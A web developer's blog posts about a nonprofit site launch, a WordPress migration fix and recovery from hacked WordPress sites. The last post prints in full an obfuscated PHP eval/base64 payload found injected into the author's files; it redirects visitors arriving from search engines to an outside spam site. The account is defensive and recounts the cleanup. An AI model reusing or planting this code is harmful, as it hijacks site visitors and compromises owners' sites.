Category: Web Development

Website launch!

GOTR KnoxvilleMy latest freelance project, Girls of the Run of Greater Knoxville, launched this morning!

For this project, I completed a domain transfer & registration and provide website hosting. The new website uses WordPress as a CMS. The website is entirely custom, designed and developed from scratch.

The overall design concept is energetic and playful, aligning with the overall brand of Girls on the Run International. The WordPress theme employs responsive web development (check out the site on your desktop computer compared to your smartphone!).

Website shown on local news channel

This article is a few months old, but I was doing some googling for one of my UT websites, and I found this article:

It features a video in addition to a text story, and in the video they do B-roll of several pages of my site! It’s so great to see what an impact the things we do every day have on other people.

Our core Cone Zone team brainstormed about what to name this campaign, how to brand it, how to launch it, wayfinding, signage, responsive website design & development, use of QR codes, analytics on the QR codes and website… oh gosh, tons and tons of conceptualization and strategizing. And, of course, execution. Right now we’re doing another big push to get some signage and new features up before the new students arrive on campus.

It’s really flattering and exciting to see the hard work pay off. 🙂

Family website migrated

A week or so ago I was talking about migrating all my WordPress installations to a new hosting provider. Well, my family website migration must be a cat because I swear it died 9 times on its way over. Eventually I just used Cyberduck and manually migrated the entire /uploads/ directory (btw, 4 years worth of images took FOREVER), then in phpMyAdmin I did SQL exports of every WordPress table in the installation, then on the new hosting space, imported all the SQL exports using phpMyAdmin. Took a while, everything looked beautiful when I visited the site, but I tried to login and was greeted with the error message:

You do not have sufficient permissions to access this page.


Did lots of googling and discovered a fix that solved my permissions problem.

I changed table prefixes post-WordPress-installation (to match the SQL export), and I discovered there are a few values that are important to change in addition to the table prefixes.

Here are the additional values that must be changed:

In the


table, there are several meta_keys:


In the


table, there is a critical option_name that needs to be changed:


Depending on your install and plugins, there may be more. For me, this has fixed it. Will post again if it’s not enough.

WordPress + Google Search Result links redirected/hijacked/hacked

A couple weeks ago it was brought to my attention that when googling myself and then clicking on the Google search links, users were redirected to various spam websites instead of the actual website they wanted to visit. Since I don’t google myself to visit my personal & freelance websites (I visit them directly by typing the URL into the address bar), I was entirely unaware of this problem.

I started troubleshooting this problem by googling the keywords to all the websites I host. For every WordPress website that I hosted, the google search links were hijacked and redirected to spam sites. For any static HTML pages that I hosted, the google search links took me to the correct website.

This told me that every single one of my WordPress websites had been hacked and infected with a script. In fact, when troubleshooting, I discovered that not only was it the root level (home page) of the site, but all the sitelinks (the sub links shown underneath the main search result) had been infected as well. To me, this meant that the “virus” was at least in the header.php file of the WP install.

Coincidentally, I had just made the decision to switch hosting providers. I have been with BlueHost since June 2009 and honestly have never had any negative experiences. Within the past year, my work had a hugely negative experience with BlueHost. Long story short, all of our websites hosted with them vanished into the aether. This included all of our WordPress installs and our web team’s wiki. Their response to our troubleticket was something along the lines of something blew up, nothing we can do, surely you understand. Fortunately, we do not understand and we do understand that rolling us to a backup is a reasonable expectation that they failed to see or execute. This experience terrifies me since I provide hosting for freelance clients. If their websites vanished one day with NO BACKUP, well… I’d be f’ed. As a consequence of this experience, I waited until my BlueHost hosting plan was close to expiration and then bought new hosting with DreamHost (recommended to me by a few coworkers).

Back to the hacked WordPress sites. I deduced that at the very least my header.php files were hacked, and they likely became that way because of a lack of security with my hosting provider as well as very slightly out of date WordPress installations. I needed to check my WP files on the server and then migrate all my domains and hosting off of BlueHost.

Saturday morning I checked my WP files. I began by checking index.php at the root level of the install and then in the wp-content subdirectories. EVERY SINGLE opening PHP tag was followed by this nastiness:

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9")); ?>

Then, I checked my header.php file. EVERY SINGLE PHP tag was followed with this code. Literally every time my WP theme opens PHP to use a WP template tag, nasty infection virus code. Literally, metadata, keywords, title, everything, everything.

Obviously I’d been googling to troubleshoot this problem. All the google results were forums, blogs, discussion groups, etc talking about Norton, McAfee, Spider-something, and all other anti-virus software. Well it was obvious to me that the problem was not on my machine (I tested on my work Mac Pro, my home MacBook Pro, and my iPad) but on my server area. My wise husband said, “Hun, put ‘Mac’ on the end of your search.” Goodness sakes that was silly of me. Bam, I throw ‘Mac’ on the end of my search and all of a sudden I see the forums saying that it’s a server problem. That brilliant idea spurred another brilliant idea. I google the nasty infection code (shown above). Looky what I found:
Another poor soul whose WordPress site got hacked. He explains his solution to the problem here.

The bare bones “non-technical” solution that I thought of is to export your WP data to xml then re-import the data on a fresh WordPress installation. The probability of this solution working was confirmed by the link above. A few caveats or things to keep in mind…

  • Change hosting providers, and if you can afford it, opt for private hosting (shared hosting is the cheapest and it’s where they put you on a box with other people). If it happened to you once, it will happen to you again. Hubby suggested that it could be someone else that’s on the same box as me infecting everyone on the box. So even if I deleted my WP installs & did a fresh install, it is possible that the files would get hacked all over again within minutes.
  • Change your theme. All the installed themes are going to be infected too. Luckily I was running a child theme of 2011 and my child theme only had two php files with a small amount of customization. If you must keep the same theme, which I felt like I needed to, remove the virus code from the appropriate files, download locally, and zip up so you have a clean version of the theme you’re running.

The highly technical solution is to run a command line script on the server that finds all the files that have the virus code in them and duplicates all the files but without that code. Then it kills all the files that have the code. My command line juju is severely lacking and I’m terrified of that black box screen. This solution was mentioned in the two posts that guided me (linked above) and the actual script and nitty gritty details can be found here:

I am ECSTATIC to report that downloading the XML export, downloading my child theme files, editing and then zipping my clean child theme files, changing hosting providers, doing a fresh WordPress install, uploading my XML, and reinstalling my clean child theme left me with a nearly perfect migration of my old website.

The only problem that I experienced is that some of my post images did not migrate over. What I did to work around that was download my entire


folder from my old site and then upload the entire


directory on my new server space. The image URLs within posts no longer returned 404s, woot woot! The only problem is that none of my [gallery] shortcodes work. I thought it was because the images are not linked to the post gallery, but my entire media library is empty. Frankly… I said eff it. Atleast all my data is here, my single images are here, my google search links take users to me, if I lose a few galleries… well that is a price that I am willing to pay.